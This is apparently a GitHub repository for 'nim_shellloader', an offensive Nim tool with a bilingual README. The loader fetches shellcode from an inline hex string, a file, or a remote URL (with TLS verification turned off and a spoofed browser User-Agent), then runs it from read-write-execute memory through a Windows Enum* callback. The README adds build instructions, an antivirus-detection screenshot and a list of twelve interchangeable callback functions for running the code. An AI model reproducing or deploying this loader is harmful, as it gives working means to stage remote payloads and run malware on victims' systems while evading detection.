├── README.md ├── dll_you_maybe_need ├── libcrypto-1_1-x64.dll ├── libenchant.dll ├── libpq.dll ├── libsasl.dll ├── libsodium.dll ├── libssh2.dll ├── libssl-1_1-x64.dll └── readme.md ├── image ├── 1.gif ├── 2.gif ├── 3.gif ├── 4.png ├── 5.png └── 6.png ├── shellcode_loader.exe └── shellcode_loader.nim /README.md: -------------------------------------------------------------------------------- 1 | # nim_shellloader 2 | 3 | 详见以下: 4 | details: 5 | # usage 6 | ``` 7 | loader.exe payload.bin 8 | loader.exe (yourshellcode) 9 | loader.exe (http://xxxx/xxx) 10 | ``` 11 | put your url/bin/shellcode directly 12 | 后面直接跟shellcode内容 或者bin文件名 或者网址就行 13 | 14 | 15 | ①use shellcode: 16 | 17 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/1.gif) 18 | 19 | ②use bin file 20 | 21 | 使用bin文件加载shellcode 22 | 23 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/2.gif) 24 | 25 | ③ load the shellcode which is on your server (remote load) 26 | 加载你服务器上的shellcode 27 | 28 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/3.gif) 29 | 30 | Besides, you can load shellcode which is on your repository (gitee, github, etc.) 
like this 31 | 32 | 此外 你还可以把shellcode放在github,gitee的地方让loader去读 33 | 34 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/4.png) 35 | 36 | Notice: You must remove '\x' from your shellcode 37 | 38 | 注意:你必须去除你shellcode中的 \x 39 | 40 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/5.png) 41 | 42 | 43 | 查杀情况 44 | 45 | 46 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/6.png) 47 | 48 | # 编译 compile 49 | 50 | step1: install the required libraries 安装所需的库 51 | ``` 52 | nimble install https://github.com/khchen/winim 53 | nimble install https://github.com/status-im/nim-stew 54 | ``` 55 | step2: generate the exe 生成exe 56 | ``` 57 | nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim 58 | ``` 59 | # Advice 建议 60 | windows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingw 61 | 62 | 63 | It's easy to run into problems if you compile it on the Windows platform. In my opinion, you'd better compile it on Linux 64 | 65 | 66 | 如果出现 :```could not load:(libcrypto-1_1|libeay32).dll``` 67 | If it fails with :```could not load:(libcrypto-1_1|libeay32).dll``` 68 | 69 | 考虑是运行的平台问题 因为编译的时候i386是x86的 所以出现这个问题就把i386换成amd64 70 | 71 | I think this is because of the wrong command (it didn't match the target's platform), so please change "i386" to "amd64", like the following 72 | 73 | ``` 74 | nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim 75 | ``` 76 | 77 | If it is compiled on windows, you don't need to add ```-d:mingw``` 78 | 79 | 如果是windows上编译 则可以不用加```-d:mingw``` 80 | ## 你可能会在运行这个加载器上出现问题 如果你出现 81 | ## It's possible that the shellcode_loader will go wrong with: 82 | could not load: (libcrypto-1_1-x64|libeay64).dll 83 | 84 | 你可能需要解决这些库 85 | 86 | That means you may need to provide these DLLs 87 | ``` 88 | libcrypto-1_1-x64.dll 89 | 90 | libenchant.dll 91 | 92 | libpq.dll 93 | 94 | libsasl.dll 95 | 96 | libsodium.dll 97 | 98 | libssh2.dll 99 | 100 | libssl-1_1-x64.dll 101 | ``` 102 | You can find them under the folder which belongs to PHP 103 | 104 | 
这些库可以在windows下 php环境中找到 105 | 106 | Also , you can download them on the Internet 107 | 也可以从网上下载 108 | 109 | 110 | ## 源码中的EnumSystemGeoID回调函数可以换成以下函数 等价 111 | ## The callback function named "EnumSystemGeoID" in my source can be replaced with following function 112 | ``` 113 | # Callback execution 114 | EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #① 115 | EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#② 116 | EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③ 117 | EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④ 118 | EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤ 119 | EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥ 120 | EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦ 121 | EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧ 122 | EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨ 123 | EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩ 124 | EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11 125 | EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12 126 | ``` 127 | -------------------------------------------------------------------------------- /dll_you_maybe_need/libcrypto-1_1-x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libcrypto-1_1-x64.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libenchant.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libenchant.dll 
-------------------------------------------------------------------------------- /dll_you_maybe_need/libpq.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libpq.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libsasl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libsasl.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libsodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libsodium.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libssh2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libssh2.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libssl-1_1-x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libssl-1_1-x64.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /image/1.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/1.gif -------------------------------------------------------------------------------- /image/2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/2.gif -------------------------------------------------------------------------------- /image/3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/3.gif -------------------------------------------------------------------------------- /image/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/4.png -------------------------------------------------------------------------------- /image/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/5.png -------------------------------------------------------------------------------- /image/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/6.png -------------------------------------------------------------------------------- /shellcode_loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/shellcode_loader.exe 
-------------------------------------------------------------------------------- /shellcode_loader.nim: --------------------------------------------------------------------------------
# Command-line loader: takes one argument (a URL, a file path, or an inline
# hex string), decodes it to bytes and executes those bytes inside this
# process. The repository ships the prebuilt shellcode_loader.exe alongside
# this source; see README.md for the build flags.
import httpclient
import streams
import os
import strutils
import winim/lean
import stew/byteutils
import net

# Copies `shellcode` into a freshly allocated memory region of the current
# process and transfers control to it by passing the region's address as the
# callback of EnumSystemGeoID.
# Review notes (risk/detection): the region is requested as
# PAGE_EXECUTE_READ_WRITE in one VirtualAlloc call and the result is never
# checked, so a nil return (allocation failure) flows straight into copyMem.
# Everything runs in the loader's own process — the "Target Process" printed
# is the loader's own PID.
proc shellcodeCallback(shellcode: openarray[byte]): void =
  echo "[*] T00ls.cc Nim-shellcode-loader shadowwolf"
  let CurrentProcess = GetCurrentProcessId()
  echo "[*] Target Process: ", CurrentProcess
  echo "[*] Length Of Shellcode: ", len(shellcode)
  echo "[+] Injecting!"
  discard """
  T00ls.cc 14454-shadowwolf
  """
  # Application for memory
  # Readable, writable and executable at the same time; no nil check.
  let rPtr = VirtualAlloc(
    nil,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )

  # Copy Shellcode to the allocated memory section
  copyMem(rPtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len))

  # Callback execution
  # 16 is the GeoClass argument; the README lists the same call written with
  # the GEOCLASS_NATION constant in that position.
  EnumSystemGeoID(
    16,
    0,
    cast[GEO_ENUMPROC](rPtr)
  )

# Fetches `url` with a browser-like User-Agent header and returns the body
# with every "\x", "," and " " removed, i.e. a bare hex string.
# Review notes (risk): the client is created with verifyMode=CVerifyNone, so
# the server's TLS certificate is not validated and any on-path party can
# substitute the body; the HTTP status code is also never checked, so an
# error page body is returned just like a payload. The local `sslContext`
# type is not referenced anywhere in this proc.
proc RequestGet(url:string,header={"user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"}):string=
  type
    sslContext=ref object
  var
    client = newHttpClient(sslContext=newContext(verifyMode=CVerifyNone))
    RequestHeaders=newHttpHeaders(header)
    resp=client.request(url,headers=RequestHeaders)
  return resp.bodyStream.readAll().replace("\\x"," ").replace(",","").replace(" ","")

#To get the shellcode on the website you put on
# Dispatches on the single argument: any string containing "http" is treated
# as a URL, otherwise an existing file path, otherwise an inline hex string.
# Each branch decodes to a byte seq and hands it to shellcodeCallback.
# Review notes: the "http" test is a substring match, not a scheme check;
# in the file branch the byte count returned by readBytes is discarded, so a
# short read is not detected; hexToByteArray (stew/byteutils) is presumably
# what rejects odd-length or non-hex input — confirm against the stew version
# in use.
proc GetShellcodeAndRun(para:string):void=
  if("http" in para):
    echo "[*] Get the shellcode on the website:"
    let resp=RequestGet(para)#Get the shellcode on your website
    var shellcode = newSeq[byte](len(resp) div 2)#calc the length
    hexToByteArray(resp, shellcode)#convert hex string into array
    shellcodeCallback(shellcode)#execute
  elif fileExists(para):
    echo "[*] Get the file:"
    var
      filename = para
      file: File
    file = open(filename, fmRead)
    var fileSize = file.getFileSize()
    var shellcode = newSeq[byte](fileSize)
    # Return value (bytes actually read) is ignored.
    discard file.readBytes(shellcode, 0, fileSize)
    file.close()
    shellcodeCallback(shellcode)
  else:
    echo "[*] Get the string:"
    var hexstr: string = para
    var shellcode = newSeq[byte](len(hexstr) div 2)
    hexToByteArray(hexstr, shellcode)
    shellcodeCallback(shellcode)

# Entry point: only the first command-line argument is used; with no
# arguments the program exits without doing anything.
if paramCount()>=1:
  var para:string=paramStr(1)
  GetShellcodeAndRun(para)

--------------------------------------------------------------------------------